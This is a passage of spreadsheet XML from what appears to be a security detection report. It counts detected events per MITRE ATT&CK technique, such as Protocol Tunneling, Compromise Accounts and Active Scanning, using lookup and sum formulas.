      <c r="BU64" s="394">
        <v>1</v>
      </c>
      <c r="BV64" s="292">
        <v>0</v>
      </c>
      <c r="BW64" s="322">
        <v>0</v>
      </c>
      <c r="BX64" s="322">
        <v>0</v>
      </c>
      <c r="BY64" s="12">
        <v>0</v>
      </c>
      <c r="BZ64" s="13">
        <v>0</v>
      </c>
      <c r="CA64" s="394">
        <v>0</v>
      </c>
      <c r="CB64" s="292">
        <v>1</v>
      </c>
      <c r="CC64" s="322">
        <v>1</v>
      </c>
      <c r="CD64" s="322">
        <v>0</v>
      </c>
      <c r="CE64" s="12">
        <v>0</v>
      </c>
      <c r="CF64" s="12">
        <v>1</v>
      </c>
      <c r="CG64" s="13">
        <v>1</v>
      </c>
      <c r="CH64" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:98" ht="15" customHeight="1">
      <c r="A65" s="4">
        <f t="shared" si="0"/>
        <v>63</v>
      </c>
      <c r="B65" s="4" t="str">
        <f>IFERROR(VLOOKUP(A65,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1572</v>
      </c>
      <c r="C65" s="4" t="str">
        <f>IFERROR(VLOOKUP(B65,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Protocol Tunneling</v>
      </c>
      <c r="D65" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B65)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F65" s="286" t="str">
        <f t="shared" si="1"/>
        <v>1 (3)</v>
      </c>
      <c r="G65" s="292">
        <v>6</v>
      </c>
      <c r="H65" s="322">
        <v>2</v>
      </c>
      <c r="I65" s="322">
        <v>0</v>
      </c>
      <c r="J65" s="12">
        <v>1</v>
      </c>
      <c r="K65" s="13">
        <v>1</v>
      </c>
      <c r="L65" s="394">
        <v>2</v>
      </c>
      <c r="M65" s="322">
        <v>1</v>
      </c>
      <c r="N65" s="322">
        <v>1</v>
      </c>
      <c r="O65" s="322">
        <v>0</v>
      </c>
      <c r="P65" s="12">
        <v>1</v>
      </c>
      <c r="Q65" s="13">
        <v>1</v>
      </c>
      <c r="R65" s="394">
        <v>1</v>
      </c>
      <c r="S65" s="292">
        <v>7</v>
      </c>
      <c r="T65" s="322">
        <v>3</v>
      </c>
      <c r="U65" s="322">
        <v>0</v>
      </c>
      <c r="V65" s="12">
        <v>2</v>
      </c>
      <c r="W65" s="13">
        <v>1</v>
      </c>
      <c r="X65" s="394">
        <v>2</v>
      </c>
      <c r="Y65" s="392">
        <v>7</v>
      </c>
      <c r="Z65" s="392">
        <v>3</v>
      </c>
      <c r="AA65" s="322">
        <v>0</v>
      </c>
      <c r="AB65" s="392">
        <v>2</v>
      </c>
      <c r="AC65" s="16">
        <v>1</v>
      </c>
      <c r="AD65" s="394">
        <v>2</v>
      </c>
      <c r="AE65" s="392">
        <v>6</v>
      </c>
      <c r="AF65" s="392">
        <v>4</v>
      </c>
      <c r="AG65" s="322">
        <v>0</v>
      </c>
      <c r="AH65" s="392">
        <v>4</v>
      </c>
      <c r="AI65" s="16">
        <v>1</v>
      </c>
      <c r="AJ65" s="394">
        <v>3</v>
      </c>
      <c r="AK65" s="392">
        <v>13</v>
      </c>
      <c r="AL65" s="392">
        <v>7</v>
      </c>
      <c r="AM65" s="322">
        <v>0</v>
      </c>
      <c r="AN65" s="392">
        <v>6</v>
      </c>
      <c r="AO65" s="16">
        <v>1</v>
      </c>
      <c r="AP65" s="394">
        <v>3</v>
      </c>
      <c r="AQ65" s="292">
        <v>0</v>
      </c>
      <c r="AR65" s="322">
        <v>0</v>
      </c>
      <c r="AS65" s="322">
        <v>0</v>
      </c>
      <c r="AT65" s="12">
        <v>0</v>
      </c>
      <c r="AU65" s="13">
        <v>0</v>
      </c>
      <c r="AV65" s="394">
        <v>0</v>
      </c>
      <c r="AW65" s="392">
        <v>1</v>
      </c>
      <c r="AX65" s="392">
        <v>1</v>
      </c>
      <c r="AY65" s="322">
        <v>0</v>
      </c>
      <c r="AZ65" s="4">
        <v>1</v>
      </c>
      <c r="BA65" s="16">
        <v>1</v>
      </c>
      <c r="BB65" s="394">
        <v>1</v>
      </c>
      <c r="BC65" s="292">
        <v>8</v>
      </c>
      <c r="BD65" s="322">
        <v>4</v>
      </c>
      <c r="BE65" s="322">
        <v>0</v>
      </c>
      <c r="BF65" s="12">
        <v>3</v>
      </c>
      <c r="BG65" s="13">
        <v>1</v>
      </c>
      <c r="BH65" s="394">
        <v>2</v>
      </c>
      <c r="BI65" s="292">
        <v>4</v>
      </c>
      <c r="BJ65" s="322">
        <v>3</v>
      </c>
      <c r="BK65" s="322">
        <v>0</v>
      </c>
      <c r="BL65" s="12">
        <v>3</v>
      </c>
      <c r="BM65" s="13">
        <v>1</v>
      </c>
      <c r="BN65" s="394">
        <v>2</v>
      </c>
      <c r="BO65" s="292">
        <v>6</v>
      </c>
      <c r="BP65" s="322">
        <v>5</v>
      </c>
      <c r="BQ65" s="322">
        <v>0</v>
      </c>
      <c r="BR65" s="12">
        <v>3</v>
      </c>
      <c r="BS65" s="12">
        <v>2</v>
      </c>
      <c r="BT65" s="13">
        <v>1</v>
      </c>
      <c r="BU65" s="394">
        <v>2</v>
      </c>
      <c r="BV65" s="292">
        <v>0</v>
      </c>
      <c r="BW65" s="322">
        <v>0</v>
      </c>
      <c r="BX65" s="322">
        <v>0</v>
      </c>
      <c r="BY65" s="12">
        <v>0</v>
      </c>
      <c r="BZ65" s="13">
        <v>0</v>
      </c>
      <c r="CA65" s="394">
        <v>0</v>
      </c>
      <c r="CB65" s="292">
        <v>1</v>
      </c>
      <c r="CC65" s="322">
        <v>1</v>
      </c>
      <c r="CD65" s="322">
        <v>0</v>
      </c>
      <c r="CE65" s="12">
        <v>0</v>
      </c>
      <c r="CF65" s="12">
        <v>1</v>
      </c>
      <c r="CG65" s="13">
        <v>1</v>
      </c>
      <c r="CH65" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:98" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A66" s="4">
        <f t="shared" si="0"/>
        <v>64</v>
      </c>
      <c r="B66" s="4" t="str">
        <f>IFERROR(VLOOKUP(A66,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1573</v>
      </c>
      <c r="C66" s="4" t="str">
        <f>IFERROR(VLOOKUP(B66,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Encrypted Channel</v>
      </c>
      <c r="D66" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B66)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F66" s="286" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="G66" s="292">
        <v>3</v>
      </c>
      <c r="H66" s="322">
        <v>3</v>
      </c>
      <c r="I66" s="322">
        <v>0</v>
      </c>
      <c r="J66" s="12">
        <v>3</v>
      </c>
      <c r="K66" s="13">
        <v>1</v>
      </c>
      <c r="L66" s="394">
        <v>1</v>
      </c>
      <c r="M66" s="322">
        <v>0</v>
      </c>
      <c r="N66" s="322">
        <v>0</v>
      </c>
      <c r="O66" s="322">
        <v>0</v>
      </c>
      <c r="P66" s="12">
        <v>0</v>
      </c>
      <c r="Q66" s="13">
        <v>0</v>
      </c>
      <c r="R66" s="394">
        <v>0</v>
      </c>
      <c r="S66" s="292">
        <v>3</v>
      </c>
      <c r="T66" s="322">
        <v>3</v>
      </c>
      <c r="U66" s="322">
        <v>0</v>
      </c>
      <c r="V66" s="12">
        <v>3</v>
      </c>
      <c r="W66" s="13">
        <v>1</v>
      </c>
      <c r="X66" s="394">
        <v>1</v>
      </c>
      <c r="Y66" s="392">
        <v>3</v>
      </c>
      <c r="Z66" s="392">
        <v>3</v>
      </c>
      <c r="AA66" s="322">
        <v>0</v>
      </c>
      <c r="AB66" s="392">
        <v>3</v>
      </c>
      <c r="AC66" s="16">
        <v>1</v>
      </c>
      <c r="AD66" s="394">
        <v>1</v>
      </c>
      <c r="AE66" s="392">
        <v>5</v>
      </c>
      <c r="AF66" s="392">
        <v>3</v>
      </c>
      <c r="AG66" s="322">
        <v>0</v>
      </c>
      <c r="AH66" s="392">
        <v>3</v>
      </c>
      <c r="AI66" s="16">
        <v>1</v>
      </c>
      <c r="AJ66" s="394">
        <v>2</v>
      </c>
      <c r="AK66" s="392">
        <v>8</v>
      </c>
      <c r="AL66" s="392">
        <v>6</v>
      </c>
      <c r="AM66" s="322">
        <v>0</v>
      </c>
      <c r="AN66" s="392">
        <v>6</v>
      </c>
      <c r="AO66" s="16">
        <v>1</v>
      </c>
      <c r="AP66" s="394">
        <v>2</v>
      </c>
      <c r="AQ66" s="292">
        <v>0</v>
      </c>
      <c r="AR66" s="322">
        <v>0</v>
      </c>
      <c r="AS66" s="322">
        <v>0</v>
      </c>
      <c r="AT66" s="12">
        <v>0</v>
      </c>
      <c r="AU66" s="13">
        <v>0</v>
      </c>
      <c r="AV66" s="394">
        <v>0</v>
      </c>
      <c r="AW66" s="392">
        <v>0</v>
      </c>
      <c r="AX66" s="392">
        <v>0</v>
      </c>
      <c r="AY66" s="322">
        <v>0</v>
      </c>
      <c r="AZ66" s="4">
        <v>0</v>
      </c>
      <c r="BA66" s="16">
        <v>0</v>
      </c>
      <c r="BB66" s="394">
        <v>0</v>
      </c>
      <c r="BC66" s="292">
        <v>3</v>
      </c>
      <c r="BD66" s="322">
        <v>3</v>
      </c>
      <c r="BE66" s="322">
        <v>0</v>
      </c>
      <c r="BF66" s="12">
        <v>3</v>
      </c>
      <c r="BG66" s="13">
        <v>1</v>
      </c>
      <c r="BH66" s="394">
        <v>1</v>
      </c>
      <c r="BI66" s="292">
        <v>0</v>
      </c>
      <c r="BJ66" s="322">
        <v>0</v>
      </c>
      <c r="BK66" s="322">
        <v>0</v>
      </c>
      <c r="BL66" s="12">
        <v>0</v>
      </c>
      <c r="BM66" s="13">
        <v>0</v>
      </c>
      <c r="BN66" s="394">
        <v>0</v>
      </c>
      <c r="BO66" s="292">
        <v>2</v>
      </c>
      <c r="BP66" s="322">
        <v>2</v>
      </c>
      <c r="BQ66" s="322">
        <v>0</v>
      </c>
      <c r="BR66" s="12">
        <v>0</v>
      </c>
      <c r="BS66" s="12">
        <v>2</v>
      </c>
      <c r="BT66" s="13">
        <v>1</v>
      </c>
      <c r="BU66" s="394">
        <v>1</v>
      </c>
      <c r="BV66" s="292">
        <v>0</v>
      </c>
      <c r="BW66" s="322">
        <v>0</v>
      </c>
      <c r="BX66" s="322">
        <v>0</v>
      </c>
      <c r="BY66" s="12">
        <v>0</v>
      </c>
      <c r="BZ66" s="13">
        <v>0</v>
      </c>
      <c r="CA66" s="394">
        <v>0</v>
      </c>
      <c r="CB66" s="292">
        <v>0</v>
      </c>
      <c r="CC66" s="322">
        <v>0</v>
      </c>
      <c r="CD66" s="322">
        <v>0</v>
      </c>
      <c r="CE66" s="12">
        <v>0</v>
      </c>
      <c r="CF66" s="12">
        <v>0</v>
      </c>
      <c r="CG66" s="13">
        <v>0</v>
      </c>
      <c r="CH66" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:98" ht="15" customHeight="1">
      <c r="A67" s="4">
        <f t="shared" si="0"/>
        <v>65</v>
      </c>
      <c r="B67" s="4" t="str">
        <f>IFERROR(VLOOKUP(A67,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1585</v>
      </c>
      <c r="C67" s="4" t="str">
        <f>IFERROR(VLOOKUP(B67,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Establish Accounts</v>
      </c>
      <c r="D67" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B67)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>129</v>
      </c>
      <c r="F67" s="286" t="str">
        <f t="shared" si="1"/>
        <v>1 (129)</v>
      </c>
      <c r="G67" s="292">
        <v>1675</v>
      </c>
      <c r="H67" s="322">
        <v>312</v>
      </c>
      <c r="I67" s="322">
        <v>0</v>
      </c>
      <c r="J67" s="12">
        <v>6</v>
      </c>
      <c r="K67" s="13">
        <v>1</v>
      </c>
      <c r="L67" s="394">
        <v>125</v>
      </c>
      <c r="M67" s="322">
        <v>0</v>
      </c>
      <c r="N67" s="322">
        <v>0</v>
      </c>
      <c r="O67" s="322">
        <v>0</v>
      </c>
      <c r="P67" s="12">
        <v>0</v>
      </c>
      <c r="Q67" s="13">
        <v>0</v>
      </c>
      <c r="R67" s="394">
        <v>0</v>
      </c>
      <c r="S67" s="292">
        <v>1675</v>
      </c>
      <c r="T67" s="322">
        <v>312</v>
      </c>
      <c r="U67" s="322">
        <v>0</v>
      </c>
      <c r="V67" s="12">
        <v>6</v>
      </c>
      <c r="W67" s="13">
        <v>1</v>
      </c>
      <c r="X67" s="394">
        <v>125</v>
      </c>
      <c r="Y67" s="392">
        <v>1676</v>
      </c>
      <c r="Z67" s="392">
        <v>312</v>
      </c>
      <c r="AA67" s="322">
        <v>0</v>
      </c>
      <c r="AB67" s="392">
        <v>6</v>
      </c>
      <c r="AC67" s="16">
        <v>1</v>
      </c>
      <c r="AD67" s="394">
        <v>125</v>
      </c>
      <c r="AE67" s="392">
        <v>3</v>
      </c>
      <c r="AF67" s="392">
        <v>3</v>
      </c>
      <c r="AG67" s="322">
        <v>0</v>
      </c>
      <c r="AH67" s="392">
        <v>1</v>
      </c>
      <c r="AI67" s="16">
        <v>1</v>
      </c>
      <c r="AJ67" s="394">
        <v>3</v>
      </c>
      <c r="AK67" s="392">
        <v>1679</v>
      </c>
      <c r="AL67" s="392">
        <v>315</v>
      </c>
      <c r="AM67" s="322">
        <v>0</v>
      </c>
      <c r="AN67" s="392">
        <v>7</v>
      </c>
      <c r="AO67" s="16">
        <v>1</v>
      </c>
      <c r="AP67" s="394">
        <v>125</v>
      </c>
      <c r="AQ67" s="292">
        <v>0</v>
      </c>
      <c r="AR67" s="322">
        <v>0</v>
      </c>
      <c r="AS67" s="322">
        <v>0</v>
      </c>
      <c r="AT67" s="12">
        <v>0</v>
      </c>
      <c r="AU67" s="13">
        <v>0</v>
      </c>
      <c r="AV67" s="394">
        <v>0</v>
      </c>
      <c r="AW67" s="392">
        <v>0</v>
      </c>
      <c r="AX67" s="392">
        <v>0</v>
      </c>
      <c r="AY67" s="322">
        <v>0</v>
      </c>
      <c r="AZ67" s="4">
        <v>0</v>
      </c>
      <c r="BA67" s="16">
        <v>0</v>
      </c>
      <c r="BB67" s="394">
        <v>0</v>
      </c>
      <c r="BC67" s="292">
        <v>1675</v>
      </c>
      <c r="BD67" s="322">
        <v>312</v>
      </c>
      <c r="BE67" s="322">
        <v>0</v>
      </c>
      <c r="BF67" s="12">
        <v>6</v>
      </c>
      <c r="BG67" s="13">
        <v>1</v>
      </c>
      <c r="BH67" s="394">
        <v>125</v>
      </c>
      <c r="BI67" s="292">
        <v>129</v>
      </c>
      <c r="BJ67" s="322">
        <v>129</v>
      </c>
      <c r="BK67" s="322">
        <v>0</v>
      </c>
      <c r="BL67" s="12">
        <v>1</v>
      </c>
      <c r="BM67" s="13">
        <v>1</v>
      </c>
      <c r="BN67" s="394">
        <v>129</v>
      </c>
      <c r="BO67" s="292">
        <v>129</v>
      </c>
      <c r="BP67" s="322">
        <v>129</v>
      </c>
      <c r="BQ67" s="322">
        <v>0</v>
      </c>
      <c r="BR67" s="12">
        <v>1</v>
      </c>
      <c r="BS67" s="12">
        <v>0</v>
      </c>
      <c r="BT67" s="13">
        <v>1</v>
      </c>
      <c r="BU67" s="394">
        <v>129</v>
      </c>
      <c r="BV67" s="292">
        <v>0</v>
      </c>
      <c r="BW67" s="322">
        <v>0</v>
      </c>
      <c r="BX67" s="322">
        <v>0</v>
      </c>
      <c r="BY67" s="12">
        <v>0</v>
      </c>
      <c r="BZ67" s="13">
        <v>0</v>
      </c>
      <c r="CA67" s="394">
        <v>0</v>
      </c>
      <c r="CB67" s="292">
        <v>135</v>
      </c>
      <c r="CC67" s="322">
        <v>124</v>
      </c>
      <c r="CD67" s="322">
        <v>0</v>
      </c>
      <c r="CE67" s="12">
        <v>0</v>
      </c>
      <c r="CF67" s="12">
        <v>1</v>
      </c>
      <c r="CG67" s="13">
        <v>1</v>
      </c>
      <c r="CH67" s="394">
        <v>124</v>
      </c>
    </row>
    <row r="68" spans="1:98" ht="15" customHeight="1">
      <c r="A68" s="4">
        <f t="shared" si="0"/>
        <v>66</v>
      </c>
      <c r="B68" s="4" t="str">
        <f>IFERROR(VLOOKUP(A68,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1586</v>
      </c>
      <c r="C68" s="4" t="str">
        <f>IFERROR(VLOOKUP(B68,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Compromise Accounts</v>
      </c>
      <c r="D68" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B68)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6951</v>
      </c>
      <c r="F68" s="286" t="str">
        <f t="shared" si="1"/>
        <v>1 (6951)</v>
      </c>
      <c r="G68" s="292">
        <v>21291</v>
      </c>
      <c r="H68" s="322">
        <v>5739</v>
      </c>
      <c r="I68" s="322">
        <v>0</v>
      </c>
      <c r="J68" s="12">
        <v>1</v>
      </c>
      <c r="K68" s="13">
        <v>1</v>
      </c>
      <c r="L68" s="394">
        <v>5739</v>
      </c>
      <c r="M68" s="322">
        <v>3652</v>
      </c>
      <c r="N68" s="322">
        <v>2147</v>
      </c>
      <c r="O68" s="322">
        <v>0</v>
      </c>
      <c r="P68" s="12">
        <v>15</v>
      </c>
      <c r="Q68" s="13">
        <v>1</v>
      </c>
      <c r="R68" s="394">
        <v>1253</v>
      </c>
      <c r="S68" s="292">
        <v>24943</v>
      </c>
      <c r="T68" s="322">
        <v>7886</v>
      </c>
      <c r="U68" s="322">
        <v>0</v>
      </c>
      <c r="V68" s="12">
        <v>16</v>
      </c>
      <c r="W68" s="13">
        <v>1</v>
      </c>
      <c r="X68" s="394">
        <v>5955</v>
      </c>
      <c r="Y68" s="392">
        <v>656724</v>
      </c>
      <c r="Z68" s="392">
        <v>15339</v>
      </c>
      <c r="AA68" s="322">
        <v>0</v>
      </c>
      <c r="AB68" s="392">
        <v>51</v>
      </c>
      <c r="AC68" s="16">
        <v>1</v>
      </c>
      <c r="AD68" s="394">
        <v>6166</v>
      </c>
      <c r="AE68" s="392">
        <v>29203</v>
      </c>
      <c r="AF68" s="392">
        <v>10983</v>
      </c>
      <c r="AG68" s="322">
        <v>0</v>
      </c>
      <c r="AH68" s="392">
        <v>29</v>
      </c>
      <c r="AI68" s="16">
        <v>1</v>
      </c>
      <c r="AJ68" s="394">
        <v>6950</v>
      </c>
      <c r="AK68" s="392">
        <v>676263</v>
      </c>
      <c r="AL68" s="392">
        <v>23264</v>
      </c>
      <c r="AM68" s="322">
        <v>0</v>
      </c>
      <c r="AN68" s="392">
        <v>80</v>
      </c>
      <c r="AO68" s="16">
        <v>1</v>
      </c>
      <c r="AP68" s="394">
        <v>6950</v>
      </c>
      <c r="AQ68" s="292">
        <v>0</v>
      </c>
      <c r="AR68" s="322">
        <v>0</v>
      </c>
      <c r="AS68" s="322">
        <v>0</v>
      </c>
      <c r="AT68" s="12">
        <v>0</v>
      </c>
      <c r="AU68" s="13">
        <v>0</v>
      </c>
      <c r="AV68" s="394">
        <v>0</v>
      </c>
      <c r="AW68" s="392">
        <v>10190</v>
      </c>
      <c r="AX68" s="392">
        <v>6728</v>
      </c>
      <c r="AY68" s="322">
        <v>0</v>
      </c>
      <c r="AZ68" s="4">
        <v>46</v>
      </c>
      <c r="BA68" s="16">
        <v>1</v>
      </c>
      <c r="BB68" s="394">
        <v>3231</v>
      </c>
      <c r="BC68" s="292">
        <v>35133</v>
      </c>
      <c r="BD68" s="322">
        <v>14614</v>
      </c>
      <c r="BE68" s="322">
        <v>0</v>
      </c>
      <c r="BF68" s="12">
        <v>62</v>
      </c>
      <c r="BG68" s="13">
        <v>1</v>
      </c>
      <c r="BH68" s="394">
        <v>6351</v>
      </c>
      <c r="BI68" s="292">
        <v>611</v>
      </c>
      <c r="BJ68" s="322">
        <v>460</v>
      </c>
      <c r="BK68" s="322">
        <v>0</v>
      </c>
      <c r="BL68" s="12">
        <v>6</v>
      </c>
      <c r="BM68" s="13">
        <v>1</v>
      </c>
      <c r="BN68" s="394">
        <v>459</v>
      </c>
      <c r="BO68" s="292">
        <v>14512</v>
      </c>
      <c r="BP68" s="322">
        <v>14361</v>
      </c>
      <c r="BQ68" s="322">
        <v>0</v>
      </c>
      <c r="BR68" s="12">
        <v>6</v>
      </c>
      <c r="BS68" s="12">
        <v>3</v>
      </c>
      <c r="BT68" s="13">
        <v>1</v>
      </c>
      <c r="BU68" s="394">
        <v>6951</v>
      </c>
      <c r="BV68" s="292">
        <v>0</v>
      </c>
      <c r="BW68" s="322">
        <v>0</v>
      </c>
      <c r="BX68" s="322">
        <v>0</v>
      </c>
      <c r="BY68" s="12">
        <v>0</v>
      </c>
      <c r="BZ68" s="13">
        <v>0</v>
      </c>
      <c r="CA68" s="394">
        <v>0</v>
      </c>
      <c r="CB68" s="292">
        <v>696786</v>
      </c>
      <c r="CC68" s="322">
        <v>6941</v>
      </c>
      <c r="CD68" s="322">
        <v>0</v>
      </c>
      <c r="CE68" s="12">
        <v>0</v>
      </c>
      <c r="CF68" s="12">
        <v>1</v>
      </c>
      <c r="CG68" s="13">
        <v>1</v>
      </c>
      <c r="CH68" s="394">
        <v>6941</v>
      </c>
    </row>
    <row r="69" spans="1:98" ht="15" customHeight="1">
      <c r="A69" s="4">
        <f t="shared" ref="A69:A78" si="2">A68+1</f>
        <v>67</v>
      </c>
      <c r="B69" s="4" t="str">
        <f>IFERROR(VLOOKUP(A69,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1589</v>
      </c>
      <c r="C69" s="4" t="str">
        <f>IFERROR(VLOOKUP(B69,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Gather Victim Identity Information</v>
      </c>
      <c r="D69" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B69)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F69" s="286" t="str">
        <f t="shared" ref="F69:F78" si="3">D69&amp;" ("&amp;E69&amp;")"</f>
        <v>1 (7)</v>
      </c>
      <c r="G69" s="292">
        <v>14</v>
      </c>
      <c r="H69" s="322">
        <v>7</v>
      </c>
      <c r="I69" s="322">
        <v>0</v>
      </c>
      <c r="J69" s="12">
        <v>1</v>
      </c>
      <c r="K69" s="13">
        <v>1</v>
      </c>
      <c r="L69" s="394">
        <v>7</v>
      </c>
      <c r="M69" s="322">
        <v>0</v>
      </c>
      <c r="N69" s="322">
        <v>0</v>
      </c>
      <c r="O69" s="322">
        <v>0</v>
      </c>
      <c r="P69" s="12">
        <v>0</v>
      </c>
      <c r="Q69" s="13">
        <v>0</v>
      </c>
      <c r="R69" s="394">
        <v>0</v>
      </c>
      <c r="S69" s="292">
        <v>14</v>
      </c>
      <c r="T69" s="322">
        <v>7</v>
      </c>
      <c r="U69" s="322">
        <v>0</v>
      </c>
      <c r="V69" s="12">
        <v>1</v>
      </c>
      <c r="W69" s="13">
        <v>1</v>
      </c>
      <c r="X69" s="394">
        <v>7</v>
      </c>
      <c r="Y69" s="392">
        <v>14</v>
      </c>
      <c r="Z69" s="392">
        <v>7</v>
      </c>
      <c r="AA69" s="322">
        <v>0</v>
      </c>
      <c r="AB69" s="392">
        <v>1</v>
      </c>
      <c r="AC69" s="16">
        <v>1</v>
      </c>
      <c r="AD69" s="394">
        <v>7</v>
      </c>
      <c r="AE69" s="392">
        <v>1</v>
      </c>
      <c r="AF69" s="392">
        <v>1</v>
      </c>
      <c r="AG69" s="322">
        <v>0</v>
      </c>
      <c r="AH69" s="392">
        <v>1</v>
      </c>
      <c r="AI69" s="16">
        <v>1</v>
      </c>
      <c r="AJ69" s="394">
        <v>1</v>
      </c>
      <c r="AK69" s="392">
        <v>15</v>
      </c>
      <c r="AL69" s="392">
        <v>8</v>
      </c>
      <c r="AM69" s="322">
        <v>0</v>
      </c>
      <c r="AN69" s="392">
        <v>2</v>
      </c>
      <c r="AO69" s="16">
        <v>1</v>
      </c>
      <c r="AP69" s="394">
        <v>7</v>
      </c>
      <c r="AQ69" s="292">
        <v>0</v>
      </c>
      <c r="AR69" s="322">
        <v>0</v>
      </c>
      <c r="AS69" s="322">
        <v>0</v>
      </c>
      <c r="AT69" s="12">
        <v>0</v>
      </c>
      <c r="AU69" s="13">
        <v>0</v>
      </c>
      <c r="AV69" s="394">
        <v>0</v>
      </c>
      <c r="AW69" s="392">
        <v>0</v>
      </c>
      <c r="AX69" s="392">
        <v>0</v>
      </c>
      <c r="AY69" s="322">
        <v>0</v>
      </c>
      <c r="AZ69" s="4">
        <v>0</v>
      </c>
      <c r="BA69" s="16">
        <v>0</v>
      </c>
      <c r="BB69" s="394">
        <v>0</v>
      </c>
      <c r="BC69" s="292">
        <v>14</v>
      </c>
      <c r="BD69" s="322">
        <v>7</v>
      </c>
      <c r="BE69" s="322">
        <v>0</v>
      </c>
      <c r="BF69" s="12">
        <v>1</v>
      </c>
      <c r="BG69" s="13">
        <v>1</v>
      </c>
      <c r="BH69" s="394">
        <v>7</v>
      </c>
      <c r="BI69" s="292">
        <v>0</v>
      </c>
      <c r="BJ69" s="322">
        <v>0</v>
      </c>
      <c r="BK69" s="322">
        <v>0</v>
      </c>
      <c r="BL69" s="12">
        <v>0</v>
      </c>
      <c r="BM69" s="13">
        <v>0</v>
      </c>
      <c r="BN69" s="394">
        <v>0</v>
      </c>
      <c r="BO69" s="292">
        <v>7</v>
      </c>
      <c r="BP69" s="322">
        <v>7</v>
      </c>
      <c r="BQ69" s="322">
        <v>0</v>
      </c>
      <c r="BR69" s="12">
        <v>0</v>
      </c>
      <c r="BS69" s="12">
        <v>1</v>
      </c>
      <c r="BT69" s="13">
        <v>1</v>
      </c>
      <c r="BU69" s="394">
        <v>7</v>
      </c>
      <c r="BV69" s="292">
        <v>0</v>
      </c>
      <c r="BW69" s="322">
        <v>0</v>
      </c>
      <c r="BX69" s="322">
        <v>0</v>
      </c>
      <c r="BY69" s="12">
        <v>0</v>
      </c>
      <c r="BZ69" s="13">
        <v>0</v>
      </c>
      <c r="CA69" s="394">
        <v>0</v>
      </c>
      <c r="CB69" s="292">
        <v>0</v>
      </c>
      <c r="CC69" s="322">
        <v>0</v>
      </c>
      <c r="CD69" s="322">
        <v>0</v>
      </c>
      <c r="CE69" s="12">
        <v>0</v>
      </c>
      <c r="CF69" s="12">
        <v>0</v>
      </c>
      <c r="CG69" s="13">
        <v>0</v>
      </c>
      <c r="CH69" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:98" ht="15" customHeight="1">
      <c r="A70" s="4">
        <f t="shared" si="2"/>
        <v>68</v>
      </c>
      <c r="B70" s="4" t="str">
        <f>IFERROR(VLOOKUP(A70,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1595</v>
      </c>
      <c r="C70" s="4" t="str">
        <f>IFERROR(VLOOKUP(B70,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Active Scanning</v>
      </c>
      <c r="D70" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B70)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2574</v>
      </c>
      <c r="F70" s="286" t="str">
        <f t="shared" si="3"/>
        <v>3 (2574)</v>
      </c>
      <c r="G70" s="292">
        <v>224</v>
      </c>
      <c r="H70" s="322">
        <v>224</v>
      </c>
      <c r="I70" s="322">
